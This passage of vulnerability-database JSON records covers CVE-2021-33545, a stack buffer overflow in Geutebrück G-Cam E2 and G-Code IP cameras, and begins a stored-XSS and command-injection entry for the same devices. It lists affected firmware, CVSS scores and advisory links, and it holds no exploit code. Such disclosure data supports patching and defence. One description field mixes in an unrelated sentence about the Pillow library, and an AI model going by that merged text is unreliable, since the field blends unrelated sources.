        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202109-0598",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "g-code een-2010",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code een-2010",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code een-2010",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code eec-2400",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * firmware    1.12.13.2    1.12.14.5"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* een-20xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* efd-22xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ethc-22xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * g-cam"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* eec-2xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "works with the above firmware  s  e2 series camera models   encoders"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ebc-21xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * g-code"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "( multiple products )"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ewpc-22xx"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33545"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Titouan Lazard and Ibrahim Ayadhi from RandoriSec reported these vulnerabilities to CISA.",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2092"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2021-33545",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.0,
                "id": "CVE-2021-33545",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.1,
                "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 7.2,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.2,
                "id": "CVE-2021-33545",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "OTHER",
                "availabilityImpact": "High",
                "baseScore": 7.2,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2021-002023",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "High",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-33545",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "info@cert.vde.com",
                "id": "CVE-2021-33545",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "OTHER",
                "id": "JVNDB-2021-002023",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202104-975",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202107-2092",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2021-33545",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-33545"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2092"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33545"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33545"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple camera devices by UDP Technology, Geutebr\u00fcck and other vendors are vulnerable to a stack-based buffer overflow condition in the counter parameter which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 \u2025 * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. Pillow is a Python-based image processing library. \nThere is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-33545"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33545"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-33545",
            "trust": 2.6
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-21-208-03",
            "trust": 1.7
          },
          {
            "db": "JVN",
            "id": "JVNVU97817785",
            "trust": 0.8
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-21-208-05",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023",
            "trust": 0.8
          },
          {
            "db": "CS-HELP",
            "id": "SB2021041363",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975",
            "trust": 0.6
          },
          {
            "db": "CS-HELP",
            "id": "SB2021072807",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2021.2550",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2092",
            "trust": 0.6
          },
          {
            "db": "OTHER",
            "id": "NONE",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33545",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33545"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2092"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33545"
          }
        ]
      },
      "id": "VAR-202109-0598",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "OTHER",
            "id": null
          }
        ],
        "trust": 0.01
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "camera device"
            ],
            "sub_category": "camera",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          }
        ]
      },
      "last_update_date": "2025-01-30T19:32:01.831000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "GEUTEBRUCK \u2019 s\u00a0web\u00a0portal\u00a0 (Login required)",
            "trust": 0.8,
            "url": "https://portal.geutebrueck.com/"
          },
          {
            "title": "Geutebr\u00fcck G-Cam E2  and  G-Code Buffer error vulnerability fix",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=158072"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2092"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-121",
            "trust": 1.0
          },
          {
            "problemtype": "CWE-787",
            "trust": 1.0
          },
          {
            "problemtype": "Command injection (CWE-77) [ Other ]",
            "trust": 0.8
          },
          {
            "problemtype": " Stack-based buffer overflow (CWE-121) [ Other ]",
            "trust": 0.8
          },
          {
            "problemtype": " Lack of authentication for important features (CWE-306) [ Other ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33545"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.3,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03"
          },
          {
            "trust": 1.7,
            "url": "https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/"
          },
          {
            "trust": 0.8,
            "url": "https://jvn.jp/vu/jvnvu97817785/"
          },
          {
            "trust": 0.8,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-05"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2021041363"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2021.2550"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2021072807"
          },
          {
            "trust": 0.6,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33545"
          },
          {
            "trust": 0.1,
            "url": "https://ieeexplore.ieee.org/abstract/document/10769424"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/787.html"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/121.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33545"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2092"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33545"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33545"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2092"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33545"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-09-13T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-33545"
          },
          {
            "date": "2021-07-29T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "date": "2021-04-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "date": "2021-07-27T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202107-2092"
          },
          {
            "date": "2021-09-13T18:15:21.720000",
            "db": "NVD",
            "id": "CVE-2021-33545"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-09-27T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-33545"
          },
          {
            "date": "2021-07-29T08:30:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "date": "2021-04-14T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "date": "2021-10-08T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202107-2092"
          },
          {
            "date": "2021-09-27T14:30:38.633000",
            "db": "NVD",
            "id": "CVE-2021-33545"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2092"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "GEUTEBRUCK\u00a0 Made \u00a0G-Cam\u00a0E2\u00a0 and \u00a0G-Code\u00a0 Multiple vulnerabilities in",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "other",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202001-1488

    Vulnerability from variot - Updated: 2024-12-28 22:51

    Geutebruck IP Cameras G-Code(EEC-2xxx), G-Cam(EBC-21xx/EFD-22xx/ETHC-22xx/EWPC-22xx): All versions 1.12.0.25 and prior may allow a remote authenticated attacker with access to event configuration to store malicious code on the server, which could later be triggered by a legitimate user resulting in code execution within the user’s browser. Geutebruck IP Camera G-Code and G-Cam Exists in a cross-site scripting vulnerability.Information may be obtained and information may be tampered with. G-Cam is a web camera series launched by Geutebrück. G-Code is an analog video encoder launched by Geutebrück.

    Geutebrück G-Cam and G-Code have cross-site scripting vulnerabilities. The vulnerability stems from the lack of proper verification of client data by WEB applications. Attackers can use this vulnerability to execute client code. Geutebruck G-Cam and G-Code are prone to an HTML-injection vulnerability and multiple OS command-injection vulnerabilities. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user and inject and execute arbitrary commands. Other attacks are also possible. The following products of Geutebruck are affected: G-Code EEC-2xxx version 1.12.0.25 and prior G-Cam EBC-21xx version 1.12.0.25 and prior G-Cam EFD-22xx version 1.12.0.25 and prior G-Cam ETHC-22xx version 1.12.0.25 and prior G-Cam EWPC-22xx version 1.12.0.25 and prior

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202001-1488",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "g-code eec-2400",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam efd-2240",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/efd-2240",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-code/eec-2400",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam/ebc-2111",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam/ethc-2230",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
